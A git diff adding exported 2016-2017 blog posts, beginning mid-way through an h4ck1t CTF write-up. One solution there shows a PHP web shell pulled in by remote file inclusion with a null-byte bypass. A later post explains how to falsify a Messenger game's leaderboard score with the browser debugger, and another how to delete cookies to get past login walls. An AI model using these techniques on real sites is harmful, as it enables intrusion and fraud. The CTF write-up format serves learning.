||||||
|
class="markup--code markup--p-code">city</code> columns apparently. The flag was <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{87e2bc9573392d5f4458393375328cf2}</code>.</p>
|
||||||
|
<h3 name="16a6" id="16a6" class="graf graf--h3 graf-after--p">Mexico (150)</h3>
|
||||||
|
<p name="5e37" id="5e37" class="graf graf--p graf-after--h3">If you click around the navigation bar of the
|
||||||
|
website, you’ll notice that the pages are loaded by <code
|
||||||
|
class="markup--code markup--p-code">index.php?page=example</code>. It probably includes pages through
|
||||||
|
some naive include function without any sanitation, although it appends <code
|
||||||
|
class="markup--code markup--p-code">.php</code> to the end of the filename.</p>
|
||||||
|
<p name="8bdd" id="8bdd" class="graf graf--p graf-after--p">To bypass this, we just stick a <code
|
||||||
|
class="markup--code markup--p-code">%00</code> null character to the end of our URL. Then PHP stops
|
||||||
|
reading when it hits that and won’t append <code class="markup--code markup--p-code">.php</code> after the
|
||||||
|
file. But what file can we include to find the flag?</p>
|
||||||
|
<p name="a0e1" id="a0e1" class="graf graf--p graf-after--p">It occurred to me that if we could include any
|
||||||
|
file, we could set up a pastebin containing an executable PHP code, and then include it. The PHP code I
|
||||||
|
included looks like this:</p>
|
||||||
|
<pre name="cd28" id="cd28"
|
||||||
|
class="graf graf--pre graf-after--p">if (isset($_GET[‘cmd’]))<br> echo system($_GET[‘cmd’]);<br>?></pre>
|
||||||
|
<p name="4372" id="4372" class="graf graf--p graf-after--pre">Stick that in a pastebin or something, and
|
||||||
|
then include it in your URL like this:</p>
|
||||||
|
<pre name="5f6d" id="5f6d"
|
||||||
|
class="graf graf--pre graf-after--p">http://91.231.84.36:9150/index.php?page=http://pastebin.com/raw/icSpe0F0%00</pre>
|
||||||
|
<p name="e164" id="e164" class="graf graf--p graf-after--pre">Now you can execute shell commands from the
|
||||||
|
URL. Doing an <code class="markup--code markup--p-code">ls</code> on the current directory reveals a file
|
||||||
|
called <code class="markup--code markup--p-code">sup3r_$3cr3t_f1le.php</code>. If you <code
|
||||||
|
class="markup--code markup--p-code">cat sup3r*</code> then you should be able to get the flag: <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{g00d_rfi_its_y0ur_fl@g}</code>.</p>
|
||||||
|
<h3 name="4b38" id="4b38" class="graf graf--h3 graf-after--p">Mongolia (100)</h3>
|
||||||
|
<p name="e011" id="e011" class="graf graf--p graf-after--h3">In this problem we are asked to connect to
|
||||||
|
<code class="markup--code markup--p-code">ctf.com.ua:9988</code> and solve math problems. We told <code
|
||||||
|
class="markup--code markup--p-code">C = A ^ B</code> and then given C, we are asked to find A and B.
|
||||||
|
Problem is, the C that they give are sometimes hundreds of digits long. Brute forcing directly is not a
|
||||||
|
good idea.
|
||||||
|
</p>
|
||||||
|
<p name="486d" id="486d" class="graf graf--p graf-after--p">The algorithm we used was to prime-factorize C,
|
||||||
|
and then multiply the factors as A, and counting how many of each factor as B. Obviously, if a factor like
|
||||||
|
2 appeared more than once, we multiply it twice into A, rather than making B twice as large.</p>
|
||||||
|
<p name="2a7c" id="2a7c" class="graf graf--p graf-after--p">We used the Sieve of Atkin to generate a list of
|
||||||
|
primes up to 10,000,000 (although we probably didn’t need that many), and stored it into <code
|
||||||
|
class="markup--code markup--p-code">primes.txt</code>. The final program looks like this:</p>
|
||||||
|
<pre name="f6c7" id="f6c7"
|
||||||
|
class="graf graf--pre graf-after--p">from collections import Counter<br>import socket</pre>
|
||||||
|
<pre name="7f31" id="7f31"
|
||||||
|
class="graf graf--pre graf-after--pre">s = socket.socket()<br>s.connect((“ctf.com.ua”, 9988))</pre>
|
||||||
|
<pre name="50f2" id="50f2"
|
||||||
|
class="graf graf--pre graf-after--pre">primes = map(int, open(“primes.txt”).read().split(“ “))<br>i = 0<br>while True:<br> o = s.recv(8192)<br> print o<br> q = o.replace(“\n”, “”).replace(“ “, “”).split(“C=”)<br> r = int(q[-1])<br> print r<br> done = False<br> factors = []<br> for prime in primes:<br> while r % prime == 0:<br> factors.append(prime)<br> r //= prime<br> c = Counter(factors)<br> f = zip(*c.items())<br> B = min(c.values())<br> print f, c<br> A = reduce(lambda x, y: x * (y ** (c[y] // B)), f[0], 1)<br> if B == 1: A = r<br> print A, B<br> s.send(“%s %s\n” % (A, B))</pre>
|
||||||
|
<p name="16fa" id="16fa" class="graf graf--p graf-after--pre">The flag is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{R4ND0M_1S_MY_F4V0UR1T3_W34P0N}</code>.</p>
|
||||||
|
<h3 name="51b1" id="51b1" class="graf graf--h3 graf-after--p">Oman (50)</h3>
|
||||||
|
<p name="8660" id="8660" class="graf graf--p graf-after--h3">I was so excited to do this challenge! Once I
|
||||||
|
unzipped the file and saw the folders and files, I knew it was a Minecraft world save!</p>
|
||||||
|
<p name="13b9" id="13b9" class="graf graf--p graf-after--p">I kind of saw it coming, but once I opened the
|
||||||
|
world, tons of shit blew up in my face. I decided to open it with MCEdit instead. There is a sign above
|
||||||
|
the spawn point that asks you to “remove the gray”. Since there was a huge rectangular field of bedrock, I
|
||||||
|
assumed it meant that.</p>
|
||||||
|
<p name="3476" id="3476" class="graf graf--p graf-after--p">Thing is if you play, and step on the pressure
|
||||||
|
plate, it will trigger a TNT chain reaction, blowing up the blocks that make up the flag. Using MCEdit, I
|
||||||
|
just selected the bedrock region and deleted it, revealing the flag below: <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{m1n3craft_h4c3r}</code>.</p>
|
||||||
|
<h3 name="d421" id="d421" class="graf graf--h3 graf-after--p">Paraguay (250)</h3>
|
||||||
|
<p name="3a9c" id="3a9c" class="graf graf--p graf-after--h3">Honestly, this one was such a pain in the ass.
|
||||||
|
Just when you thought it was 100 nested ZIPs, suddenly a RAR comes out of nowhere. Fortunately, a Python
|
||||||
|
library called <code class="markup--code markup--p-code">pyunpack</code> figures that out for you, by
|
||||||
|
checking the magic number of the file. The final script looks like this:</p>
|
||||||
|
<pre name="1165" id="1165"
|
||||||
|
class="graf graf--pre graf-after--p">from pyunpack import *<br>import shutil</pre>
|
||||||
|
<pre name="e117" id="e117"
|
||||||
|
class="graf graf--pre graf-after--pre">for i in range(100, 0, -1):<br> Archive(“%d” % i).extractall(“.”)<br> shutil.move(“work_folder/%d” % (i — 1), “%d” % (i — 1))</pre>
|
||||||
|
<p name="4d19" id="4d19" class="graf graf--p graf-after--pre">The flag is <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{0W_MY_G0D_Y0U_M4D3_1T}</code> .</p>
|
||||||
|
<h3 name="ee3c" id="ee3c" class="graf graf--h3 graf-after--p">United States (50)</h3>
|
||||||
|
<p name="216c" id="216c" class="graf graf--p graf-after--h3">This one was a freebie. Join their Telegram
|
||||||
|
channel and you get a free flag: <code
|
||||||
|
class="markup--code markup--p-code">h4ck1t{fr33_4nd_$ecur3!}</code>.</p>
|
||||||
|
<h3 name="df84" id="df84" class="graf graf--h3 graf-after--p">Trivia</h3>
|
||||||
|
<p name="7257" id="7257" class="graf graf--p graf-after--h3">There were a lot of trivia questions on the
|
||||||
|
board! They weren’t worth much, but still pretty fun. Here are the solutions:</p>
|
||||||
|
<pre name="28e0" id="28e0"
|
||||||
|
class="graf graf--pre graf-after--p graf--trailing">Cote d’Ivoire: h4ck1t{arpanet}<br>Bolivia: h4ck1t{Tim}<br>Colombia: h4ck1t{heartbleed}<br>Costa Rica: h4ck1t{7}<br>Ecuador: h4ck1t{archie}<br>Finland: h4ck1t{mitnick}<br>Greece: h4ck1t{30}<br>Honduras: h4ck1t{Binary}<br>Italy: h4ck1t{2015}<br>Kazakhstan: h4ck1t{polymorphic}<br>Kyrgyzstan: h4ck1t{smtp}<br>Madagascar: h4ck1t{caesar}<br>Nicaragua: h4ck1t{B@S3_S0_B@S3_}<br>Nigeria: h4ck1t{128}<br>Peru: h4ck1t{Decimal}<br>Phillipines: h4ck1t{creeper}<br>Spain: h4ck1t{social engineering}<br>Venezuela: h4ck1t{admin123}</pre>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/8caf20e4b185"><time class="dt-published"
|
||||||
|
datetime="2016-10-02T20:46:42.000Z">October 2, 2016</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/h4ck1t-ctf-2016-8caf20e4b185" class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
131
src/content/posts/2016-12-01_Lightning-Speed-Run.md
Normal file
131
src/content/posts/2016-12-01_Lightning-Speed-Run.md
Normal file
|
@ -0,0 +1,131 @@
|
||||||
|
---
|
||||||
|
title: Lightning Speed Run
|
||||||
|
date: 2016-12-01T22:26:36.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="6b11" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="a5c4" id="a5c4" class="graf graf--p graf-after--h3">Recently, a new little icon appeared in the
|
||||||
|
text box on Messenger next to the camera icon and payments:</p>
|
||||||
|
<figure name="a818" id="a818" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="0*pGW634t0gBRppaDV.png" data-width="417" data-height="165"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/0*pGW634t0gBRppaDV.png">
|
||||||
|
<figcaption class="imageCaption">The games icon.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="c25c" id="c25c" class="graf graf--p graf-after--figure">If you click it, a menu shows up and you
|
||||||
|
can play a number of in-browser games. It seems that the games are run without any plugins, so they use
|
||||||
|
HTML5 to run and interact with Facebook’s API, such as setting scores on the leaderboard and whatnot.</p>
|
||||||
|
<p name="f0a0" id="f0a0" class="graf graf--p graf-after--p">In this post, I’ll look at the game <strong
|
||||||
|
class="markup--strong markup--p-strong">TRACK & FIELD 100M</strong>. The object of this game is to
|
||||||
|
press the left-foot button and the right-foot button as quickly as possible. Since your final score is the
|
||||||
|
elapsed time, lower scores will outrank higher scores. I will explain how to achieve a score of 0:00.01.
|
||||||
|
</p>
|
||||||
|
<h3 name="5a38" id="5a38" class="graf graf--h3 graf-after--p">Step 1: Finding the Source Files</h3>
|
||||||
|
<p name="5644" id="5644" class="graf graf--p graf-after--h3">It turns out that when Messenger loads the
|
||||||
|
source files for the game (which are *.js files) when you first open the game. This makes it easy to
|
||||||
|
figure out which source files are responsible for the actual game logic. In this tutorial, I’ll be using
|
||||||
|
Chrome, but I’ve confirmed that it works on Microsoft Edge as well.</p>
|
||||||
|
<p name="7b9c" id="7b9c" class="graf graf--p graf-after--p">First, open Developer Tools using Ctrl+Shift+I
|
||||||
|
or F12, and go to the Network tab. There might be a few resources loaded already; delete them with the 🛇
|
||||||
|
button. Since we are looking for JavaScript files, open the filter view and select JS.</p>
|
||||||
|
<p name="dcc3" id="dcc3" class="graf graf--p graf-after--p">Now, when Facebook loads the JavaScript source
|
||||||
|
files, they will appear in this view. Open the game menu and press the Play button next to the game TRACK
|
||||||
|
& FIELD 100M. Once you have done this, a few files will start to appear.</p>
|
||||||
|
<figure name="8807" id="8807" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="0*_aZtMhKZDxW0im1t.png" data-width="676" data-height="275"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/0*_aZtMhKZDxW0im1t.png">
|
||||||
|
<figcaption class="imageCaption">Network tab in Chrome Developer Tools.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="07f6" id="07f6" class="graf graf--p graf-after--figure">main.js looks like a pretty good place to
|
||||||
|
start. Look at the URL: <code
|
||||||
|
class="markup--code markup--p-code">https://apps-1665884840370147.apps.fbsbx.com/instant-bundle/1230433990363006/1064870650278605/main.js</code>.
|
||||||
|
Since this resource has already been loaded into the browser, we can find it under the Sources tab of
|
||||||
|
Developer Tools. Trace the path, starting from the domain like this:</p>
|
||||||
|
<figure name="360f" id="360f" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="0*Dcb_QsTKJFFrq2lg.png" data-width="676" data-height="529"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/0*Dcb_QsTKJFFrq2lg.png">
|
||||||
|
<figcaption class="imageCaption">Finding the source code.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<h3 name="e060" id="e060" class="graf graf--h3 graf-after--figure">Step 2: Analyzing main.js</h3>
|
||||||
|
<p name="df9f" id="df9f" class="graf graf--p graf-after--h3">Go ahead an pretty-print the minified file,
|
||||||
|
just like it suggests. (for those of you who didn’t get that notification, just hit the {} button next to
|
||||||
|
Line/Column. Since this file isn’t obfuscated, it’s fairly easy to just look through the file and figure
|
||||||
|
out what it does.</p>
|
||||||
|
<p name="147a" id="147a" class="graf graf--p graf-after--p">I don’t really know how to explain this part
|
||||||
|
well; if you’re familiar with code, you should be able to traverse the file pretty easily. I eventually
|
||||||
|
arrived at this function:</p>
|
||||||
|
<pre name="65f2" id="65f2"
|
||||||
|
class="graf graf--pre graf-after--p">GameScene.prototype.stepEnd_ = function() {<br> if (this.isStepTimeOver_(2e3)) {<br> var e = Math.floor(1e3 * this.timeSpeed_.getTime());<br> FBInstant.setScore(e),<br> FBInstant.takeScreenshot(),<br> this.stepFunc_ = this.stepEnd2_,<br> this.audience_.fadeTo(.5)<br> }<br>}</pre>
|
||||||
|
<p name="ff9d" id="ff9d" class="graf graf--p graf-after--pre"><code
|
||||||
|
class="markup--code markup--p-code">stepEnd_</code> is the handler for the event where the user finishes
|
||||||
|
the game. As you can see, it computes the elapsed the time, and multiplies it by 1,000 (probably because
|
||||||
|
Facebook stores these scores as integers). This is sent to Facebook using the <code
|
||||||
|
class="markup--code markup--p-code">FBInstant</code> library’s <code
|
||||||
|
class="markup--code markup--p-code">setScore</code> function. After looking at a couple of these games,
|
||||||
|
you’ll notice that <code class="markup--code markup--p-code">FBInstant</code> is pretty much universal
|
||||||
|
among these games, since it’s required to interact with the Facebook API.</p>
|
||||||
|
<h3 name="25ef" id="25ef" class="graf graf--h3 graf-after--p">Step 3: The Exploit</h3>
|
||||||
|
<p name="ed05" id="ed05" class="graf graf--p graf-after--h3">The strategy to exploit this is to add a
|
||||||
|
breakpoint at that line, so code execution is paused before that line is executed. Then we are free to
|
||||||
|
change the variable to whatever we’d like to change it to, and then resume execution so that our changed
|
||||||
|
value is sent to the server.</p>
|
||||||
|
<p name="4095" id="4095" class="graf graf--p graf-after--p">I’d like to point out that setting the variable
|
||||||
|
to non-numerical types will simply cause the upload to fail. I’m guessing they’re doing some type-checking
|
||||||
|
on it server-side. That doesn’t prevent us from simply changing the value to 0 and sending it to the
|
||||||
|
server.</p>
|
||||||
|
<p name="bf3b" id="bf3b" class="graf graf--p graf-after--p">To add a breakpoint to that line, click the line
|
||||||
|
number where the line <code class="markup--code markup--p-code">FBInstant.setScore(e)</code> appears. The
|
||||||
|
blue arrow indicates that a breakpoint has been set, and code execution will stop before this line starts.
|
||||||
|
</p>
|
||||||
|
<figure name="8c89" id="8c89" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="0*pFhcPeUtuQ3H74Qd.png" data-width="427" data-height="151"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/0*pFhcPeUtuQ3H74Qd.png">
|
||||||
|
<figcaption class="imageCaption">Adding a breakpoint in the code.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="4780" id="4780" class="graf graf--p graf-after--figure">Now, start the game and play through it
|
||||||
|
like normal. It doesn’t matter what score you get, as long as you finish and trigger the <code
|
||||||
|
class="markup--code markup--p-code">stepEnd_</code> function, the code will stop and wait for you before
|
||||||
|
submitting your score.</p>
|
||||||
|
<p name="d32b" id="d32b" class="graf graf--p graf-after--p">If you are still on the Sources tab, you’ll be
|
||||||
|
able to see the variables in the scope of the deepest function we are in when the code stops.</p>
|
||||||
|
<figure name="8f1b" id="8f1b" class="graf graf--figure graf-after--p"><img class="graf-image"
|
||||||
|
data-image-id="0*YZn_TJFtZ8NSNpne.png" data-width="679" data-height="521"
|
||||||
|
src="https://cdn-images-1.medium.com/max/800/0*YZn_TJFtZ8NSNpne.png">
|
||||||
|
<figcaption class="imageCaption">Local variables at the point where we added the breakpoint.</figcaption>
|
||||||
|
</figure>
|
||||||
|
<p name="23ff" id="23ff" class="graf graf--p graf-after--figure">Open the Console (either by navigating to
|
||||||
|
the Console tab, or just pressing Esc to open it within the Sources tab), and just type</p>
|
||||||
|
<pre name="135a" id="135a" class="graf graf--pre graf-after--p">e = 1</pre>
|
||||||
|
<p name="b024" id="b024" class="graf graf--p graf-after--pre">We just changed the value of the local
|
||||||
|
variable <code class="markup--code markup--p-code">e</code> to 1 (1 millisecond; for some reason it bugs
|
||||||
|
when I use <code class="markup--code markup--p-code">e = 0</code>). When the execution continues, it will
|
||||||
|
use our changed value, and submit that to the score server. Exit the game, and you should see that score
|
||||||
|
reflected on the leaderboard.</p>
|
||||||
|
<h3 name="d338" id="d338" class="graf graf--h3 graf-after--p">Recap</h3>
|
||||||
|
<p name="4285" id="4285" class="graf graf--p graf-after--h3">When you are developing browser-based games,
|
||||||
|
you can never trust user input. As long as the user has control, he can jack the browser logic and change
|
||||||
|
variables during runtime. Ideally, the game logic should be done server-side, and the client is simply a
|
||||||
|
terminal passing inputs to the server and visuals back to the client.</p>
|
||||||
|
<p name="2d42" id="2d42" class="graf graf--p graf-after--p">However, this is highly impractical. If you sent
|
||||||
|
a request for every input and waited for the server to respond, you’d get a huge delay, even for very fast
|
||||||
|
connections. This is one of the hardest problems to tackle in real-time RPGs: how can we verify that the
|
||||||
|
user is moving as they should, while still running the game as fast as we can?</p>
|
||||||
|
<p name="90a9" id="90a9" class="graf graf--p graf-after--p graf--trailing">That’s all I have today. Thanks
|
||||||
|
for reading!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/eb9637dc5b1c"><time class="dt-published"
|
||||||
|
datetime="2016-12-01T22:26:36.000Z">December 1, 2016</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/lightning-speed-run-eb9637dc5b1c" class="p-canonical">Canonical link</a>
|
||||||
|
</p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
32
src/content/posts/2016-12-30_XinIRC-development.md
Normal file
32
src/content/posts/2016-12-30_XinIRC-development.md
Normal file
|
@ -0,0 +1,32 @@
|
||||||
|
---
|
||||||
|
title: XinIRC development
|
||||||
|
date: 2016-12-30T05:19:21.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="a4a4" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="7483" id="7483" class="graf graf--p graf-after--h3">Today, I marked the <a
|
||||||
|
href="https://github.com/failedxyz/xinircd/releases/tag/v0.1a"
|
||||||
|
data-href="https://github.com/failedxyz/xinircd/releases/tag/v0.1a"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">initial release</a> of XinIRCd,
|
||||||
|
an IRC server that I just started working on recently. As of now, it’s still heavily inspired by InspIRCd,
|
||||||
|
from its configuration wizard to its command handling, but I’ll start adding more features soon.</p>
|
||||||
|
<p name="0b8e" id="0b8e" class="graf graf--p graf-after--p graf--trailing">I’ve still got a couple weeks
|
||||||
|
left of break, so I’ll try to get as much done in that time as possible.</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/6e7dfe8bce05"><time class="dt-published" datetime="2016-12-30T05:19:21.000Z">December
|
||||||
|
30, 2016</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/xinirc-development-6e7dfe8bce05" class="p-canonical">Canonical link</a>
|
||||||
|
</p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
|
@ -0,0 +1,51 @@
|
||||||
|
---
|
||||||
|
title: Wi-Fi Problems when Installing Linux on ASUS machines
|
||||||
|
date: 2017-01-03T22:58:06.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="0ff7" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="3a83" id="3a83" class="graf graf--p graf-after--h3">Recently, I’ve been exploring installing
|
||||||
|
various Linux distributions over my Windows installation. The main reason for doing this would be not
|
||||||
|
having to pull up a virtual machine every time I wanted to do anything.</p>
|
||||||
|
<p name="3a29" id="3a29" class="graf graf--p graf-after--p">But with both Arch Linux and Ubuntu, I kept
|
||||||
|
running into the same problem: I couldn’t connect to Wi-Fi. I poked around, and it said that my network
|
||||||
|
switch (the hardware one) was switched off. No matter what I tried to do with <code
|
||||||
|
class="markup--code markup--p-code">rfkill</code>, I couldn’t get the physical switch back on.</p>
|
||||||
|
<p name="43b7" id="43b7" class="graf graf--p graf-after--p">My ASUS computer doesn’t have a network switch.
|
||||||
|
There’s an ‘airplane mode’ button, but that didn’t really do anything either. I eventually found the
|
||||||
|
solution in <a href="https://ubuntuforums.org/showthread.php?t=2181558"
|
||||||
|
data-href="https://ubuntuforums.org/showthread.php?t=2181558" class="markup--anchor markup--p-anchor"
|
||||||
|
rel="noopener" target="_blank">this thread</a>, but I’ll repeat it here.</p>
|
||||||
|
<pre name="32a3" id="32a3"
|
||||||
|
class="graf graf--pre graf-after--p">echo "options asus_nb_wmi wapf=4" | sudo tee /etc/modprobe.d/asus_nb_wmi.conf</pre>
|
||||||
|
<p name="203e" id="203e" class="graf graf--p graf-after--pre">..or simply put that line in that file. <code
|
||||||
|
class="markup--code markup--p-code">asus_nb_wmi</code> is the driver for the Wi-Fi module. What does
|
||||||
|
<code class="markup--code markup--p-code">wapf=4</code> do? Well, according to <a
|
||||||
|
href="https://github.com/rufferson/ashs" data-href="https://github.com/rufferson/ashs"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">this</a>,
|
||||||
|
</p>
|
||||||
|
<blockquote name="9624" id="9624" class="graf graf--blockquote graf-after--p">When WAPF = 4 — driver sends
|
||||||
|
ACPI scancode 0x88 which is converted by asus-wmi to RFKILL key, which is processed by all registerd
|
||||||
|
rfkill drivers to toggle their state.</blockquote>
|
||||||
|
<p name="6456" id="6456" class="graf graf--p graf-after--blockquote">Essentially, it is making <code
|
||||||
|
class="markup--code markup--p-code">rfkill</code> recognize that the hardware switch is not off, so the
|
||||||
|
Wi-Fi works again.</p>
|
||||||
|
<p name="ca42" id="ca42" class="graf graf--p graf-after--p graf--trailing">Thanks for reading!</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/75be2b8b7cc3"><time class="dt-published" datetime="2017-01-03T22:58:06.000Z">January
|
||||||
|
3, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/wi-fi-problems-when-installing-linux-on-asus-machines-75be2b8b7cc3"
|
||||||
|
class="p-canonical">Canonical link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
63
src/content/posts/2017-01-07_Watch-out--returning-users.md
Normal file
63
src/content/posts/2017-01-07_Watch-out--returning-users.md
Normal file
|
@ -0,0 +1,63 @@
|
||||||
|
---
|
||||||
|
title: Watch out, returning users!
|
||||||
|
date: 2017-01-07T02:58:17.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="0a81" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="2c44" id="2c44" class="graf graf--p graf-after--h3">A lot of websites put <strong
|
||||||
|
class="markup--strong markup--p-strong">cookies</strong> on your computer in order to save information
|
||||||
|
about your previous visits to the site. The most common use case would be storing a key that would allow
|
||||||
|
your computer to auto-login to the site the next time you visited it (rather than forcing you to
|
||||||
|
re-login).</p>
|
||||||
|
<p name="a1d8" id="a1d8" class="graf graf--p graf-after--p">Many sites also put cookies on your computer to
|
||||||
|
figure out if you’ve visited the site before, and may change behavior based on whether you’re a new user,
|
||||||
|
or you’re a returning user.</p>
|
||||||
|
<p name="a6fd" id="a6fd" class="graf graf--p graf-after--p">For example, take a look at <a
|
||||||
|
href="https://www.livingsocial.com/deals/1630304-pokemon-go-course"
|
||||||
|
data-href="https://www.livingsocial.com/deals/1630304-pokemon-go-course"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">this website</a>. Let’s ignore
|
||||||
|
the product that it’s advertising for now and just focus on the “Limited Time Savings” offer on the right
|
||||||
|
side. Isn’t it strange how the timer started at 5:00 exactly? In other words, either you were incredibly
|
||||||
|
lucky to have visited the site <em class="markup--em markup--p-em">exactly</em> 5 minutes before the offer
|
||||||
|
ended, or there’s some other trick they’re pulling.</p>
|
||||||
|
<p name="1b3d" id="1b3d" class="graf graf--p graf-after--p">It turns out that one of the cookies (I haven’t
|
||||||
|
looked into it enough, but if you poke around, you should be able to find it) they store <strong
|
||||||
|
class="markup--strong markup--p-strong">on your machine</strong> determines when this limited time offer
|
||||||
|
either started or expires. What it means is that the first time you visit the site, the cookie is created
|
||||||
|
and you have 5 minutes from that moment to do this purchase. Afterwards, the cookie still exists on your
|
||||||
|
computer, so it won’t offer you the deal anymore.</p>
|
||||||
|
<p name="49b9" id="49b9" class="graf graf--p graf-after--p">But this means that if you get rid of the
|
||||||
|
cookie, you can get the 5 minute deal back. If you get an extension such as <a
|
||||||
|
href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg"
|
||||||
|
data-href="https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">EditThisCookie</a> that’s able to
|
||||||
|
view and manipulate cookies, then you can have a lot better control of what websites are storing on your
|
||||||
|
computer.</p>
|
||||||
|
<p name="4afc" id="4afc" class="graf graf--p graf-after--p">Some other websites this trick works on include
|
||||||
|
<a href="https://www.linkedin.com/" data-href="https://www.linkedin.com/"
|
||||||
|
class="markup--anchor markup--p-anchor" rel="noopener" target="_blank">LinkedIn</a> and <a
|
||||||
|
href="https://www.quora.com/" data-href="https://www.quora.com/" class="markup--anchor markup--p-anchor"
|
||||||
|
rel="noopener" target="_blank">Quora</a>, which ask you to create an account to view content after the
|
||||||
|
first time you visit their site. If you don’t want to create an account, then simply delete any cookies
|
||||||
|
they’ve stored on your computer and you will be able to access the site as if it was your first time.
|
||||||
|
</p>
|
||||||
|
<p name="3490" id="3490" class="graf graf--p graf-after--p graf--trailing">That’s all. Thanks for reading!
|
||||||
|
</p>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</section>
|
||||||
|
</section>
|
||||||
|
<footer>
|
||||||
|
<p>By <a href="https://medium.com/@failedxyz" class="p-author h-card">Michael Zhang</a> on <a
|
||||||
|
href="https://medium.com/p/eccca70f4684"><time class="dt-published" datetime="2017-01-07T02:58:17.000Z">January
|
||||||
|
7, 2017</time></a>.</p>
|
||||||
|
<p><a href="https://medium.com/@failedxyz/watch-out-returning-users-eccca70f4684" class="p-canonical">Canonical
|
||||||
|
link</a></p>
|
||||||
|
<p>Exported from <a href="https://medium.com">Medium</a> on October 8, 2024.</p>
|
||||||
|
</footer>
|
||||||
|
</article>
|
|
@ -0,0 +1,80 @@
|
||||||
|
---
|
||||||
|
title: Why I think HTML is a programming language.
|
||||||
|
date: 2017-01-14T09:07:31.000Z
|
||||||
|
tags: [medium-blog]
|
||||||
|
---
|
||||||
|
|
||||||
|
<article class="h-entry">
|
||||||
|
<section data-field="body" class="e-content">
|
||||||
|
<section name="21e8" class="section section--body section--first section--last">
|
||||||
|
<div class="section-content">
|
||||||
|
<div class="section-inner sectionLayout--insetColumn">
|
||||||
|
<p name="94a6" id="94a6" class="graf graf--p graf-after--h3">Yep, I’m one of those people. Go ahead and
|
||||||
|
judge me, but at least hear me out first.</p>
|
||||||
|
<p name="7407" id="7407" class="graf graf--p graf-after--p">Obviously, the first thing we have to do in
|
||||||
|
order to answer the “Is HTML a programming language?” question is to define what a programming language
|
||||||
|
is. Let’s literally take the term apart:</p>
|
||||||
|
<ul class="postList">
|
||||||
|
